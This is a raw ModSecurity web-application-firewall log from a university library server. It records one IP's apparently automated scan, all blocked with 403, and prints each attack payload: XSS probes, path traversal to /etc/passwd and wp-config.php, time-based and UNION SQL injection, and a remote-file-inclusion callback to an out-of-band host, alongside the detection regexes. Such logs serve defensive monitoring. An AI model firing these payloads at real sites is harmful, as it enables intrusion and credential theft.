[Tue Aug 29 11:48:18.412291 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14ksCo-f0AAAkAMFAAAAAU"]
[Tue Aug 29 11:48:21.402444 2023] [:error] [pid 2346] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:message_success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:message_success: <img src=c onerror=alert(8675309)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14lcCo-f0AAAkqHo4AAAAM"]
[Tue Aug 29 11:48:21.642922 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:key: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/custom-tables/iframe.php"] [unique_id "ZO14lcCo-f0AAAkrz68AAAAC"]
[Tue Aug 29 11:48:21.682928 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:calendar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:calendar: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/themes/diarise/download.php"] [unique_id "ZO14lcCo-f0AAAkrz7EAAAAC"]
[Tue Aug 29 11:48:22.472939 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:message_error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:message_error: <img src=c onerror=alert(8675309)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14lsCo-f0AAAkrz7gAAAAC"]
[Tue Aug 29 11:48:23.769483 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:loginname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:loginname: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/login/forgetpswd.php"] [unique_id "ZO14l8Co-f0AAAj12E0AAAAa"]
[Tue Aug 29 11:48:23.845932 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gnntrmu4udk9jn.oast.site/file.txt found within TX:1: cjmnbitjmimt14dgn26gnntrmu4udk9jn.oast.site/file.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO14l8Co-f0AAAj12FEAAAAa"]
[Tue Aug 29 11:48:27.908164 2023] [:error] [pid 2353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./ found within ARGS:f1: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14m8Co-f0AAAkxFxkAAAAV"]
[Tue Aug 29 11:48:31.501396 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:graph: usedMemory</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/monitoring"] [unique_id "ZO14n8Co-f0AAAj12HEAAAAa"]
[Tue Aug 29 11:48:32.360334 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:data[User][username]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:data[User][username]: data[User][username]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/users/login"] [unique_id "ZO14oMCo-f0AAAkoTjoAAAAH"]
[Tue Aug 29 11:48:33.357753 2023] [:error] [pid 2375] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14ocCo-f0AAAlHQoUAAAAm"]
[Tue Aug 29 11:48:35.347841 2023] [:error] [pid 2380] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:path: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/pacs/nocache.php"] [unique_id "ZO14o8Co-f0AAAlM8h4AAAAs"]
[Tue Aug 29 11:48:35.351343 2023] [:error] [pid 2373] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14o8Co-f0AAAlFH5cAAAAk"]
[Tue Aug 29 11:48:36.417684 2023] [:error] [pid 2380] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:comment: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO14pMCo-f0AAAlM8iAAAAAs"]
[Tue Aug 29 11:48:37.415438 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/themes/churchope/lib/downloadlink.php"] [unique_id "ZO14pcCo-f0AAAkAMJQAAAAU"]
[Tue Aug 29 11:48:38.409644 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:randomId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:randomId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php"] [unique_id "ZO14psCo-f0AAAjdQSUAAAAZ"]
[Tue Aug 29 11:48:40.436286 2023] [:error] [pid 2380] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULTPAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:RESULTPAGE: ../../../../../../../../../../../../../../../../Windows/system.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/WEBACCOUNT.CGI"] [unique_id "ZO14qMCo-f0AAAlM8i4AAAAs"]
[Tue Aug 29 11:48:43.415533 2023] [:error] [pid 2383] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within XML: 111112331%' union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/plus/weixin.php"] [unique_id "ZO14q8Co-f0AAAlPmt8AAAAv"]
[Tue Aug 29 11:48:43.431919 2023] [:error] [pid 2384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:appno: 0 union select 98989*443131,1-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14q8Co-f0AAAlQ3rgAAAAw"]
[Tue Aug 29 11:48:47.384854 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:fileName: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/plugins/servlet/snjFooterNavigationConfig"] [unique_id "ZO14r8Co-f0AAAkle0sAAAAD"]
[Tue Aug 29 11:48:49.370388 2023] [:error] [pid 2404] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mosConfig_absolute_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:mosConfig_absolute_path: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/administrator/components/com_joomla-visites/core/include/myMailer.class.php"] [unique_id "ZO14scCo-f0AAAlkwhkAAAAO"]
[Tue Aug 29 11:48:49.419719 2023] [:error] [pid 2408] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(6)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14scCo-f0AAAlo0zQAAAAJ"]
[Tue Aug 29 11:48:49.442854 2023] [:error] [pid 2437] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14scCo-f0AAAmFny0AAAAx"]
[Tue Aug 29 11:48:50.383610 2023] [:error] [pid 2379] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(16)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14ssCo-f0AAAlL7C0AAAAq"]
[Tue Aug 29 11:48:51.408566 2023] [:error] [pid 2346] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14s8Co-f0AAAkqHt4AAAAM"]
[Tue Aug 29 11:48:52.450720 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14tMCo-f0AAAfWN80AAAAL"]
[Tue Aug 29 11:48:53.376052 2023] [:error] [pid 2361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-destination-id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-destination-id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO14tcCo-f0AAAk5Cf4AAAAg"]
[Tue Aug 29 11:48:54.402786 2023] [:error] [pid 2357] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:date: 2022-05-27' union select 1,2,3,md5('999999999'),5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14tsCo-f0AAAk1w8cAAAAY"]
[Tue Aug 29 11:48:55.368845 2023] [:error] [pid 2418] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO14t8Co-f0AAAlyrB4AAAAI"]
[Tue Aug 29 11:48:55.471206 2023] [:error] [pid 2384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sbFileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:sbFileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/jsp/help-sb-download.jsp"] [unique_id "ZO14t8Co-f0AAAlQ3sgAAAAw"]
